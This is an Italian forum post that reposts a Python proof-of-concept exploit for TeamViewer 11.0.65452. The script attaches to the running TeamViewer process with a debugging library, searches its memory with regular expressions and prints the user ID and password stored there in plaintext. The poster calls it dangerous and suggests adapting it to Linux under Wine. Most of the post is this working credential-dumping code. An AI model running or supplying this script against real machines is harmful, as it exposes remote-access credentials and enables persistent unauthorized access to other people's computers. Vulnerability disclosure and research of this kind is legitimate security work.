Author Topic: [REMOTE EXPLOIT] TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure  (Read 1357 times)

Offline davenull

  • Administrator
  • Sr. Member
  • *****
  • Posts: 321
  • Thanked: 13 times
  • Gender: Male
  • JonixLug Co-Founder & Administrator
    • View Profile
    • davenull's blog
lo script è interessante e pericoloso, ecco perchè da poco è uscita la versione 12 di TeamViewer.
Poteva degnarsi di scrivere il path dell'interprete python per winzozz!!!
Volendo lo si può anche adattare per GNU-Linux, anche se nel nostro caso TeamViewer è virtualizzato sotto wine... Bisognerebbe installare l'interprete python dentro wine, in modo da non avere problemi con le interazioni con il dbus.

Code: You are not allowed to view links. Register or Login
#####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
#       Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
#       Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####

from winappdbg import Debug, Process, HexDump
import sys
import re

filename = 'TeamViewer.exe'

def memory_search( pid ):
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.

        # Looking for User ID:
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]
       
        print 'Possible UserIDs found:'
        found = [i[-1] for i in found]
        for i in set(found):
           print i.replace('\x00','')
       
        found = []
        # Looking for Password:
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'
        if len(found) > 1:
            s = list(set([x for x in found if found.count(x) > 1]))
            for i in s:
               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
            print pwd
        else:
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
       
        return found

debug = Debug()
try:
        # Lookup the currently running processes.
        debug.system.scan_processes()
        # For all processes that match the requested filename...
        for ( process, name ) in debug.system.find_processes_by_filename( filename ):
                pid = process.get_pid()

        memory_search(pid)
           
finally:
        debug.stop()

You are not allowed to view links. Register or Login
E-Mail: [email protected]
Website: You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login
 

 

Sitemap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40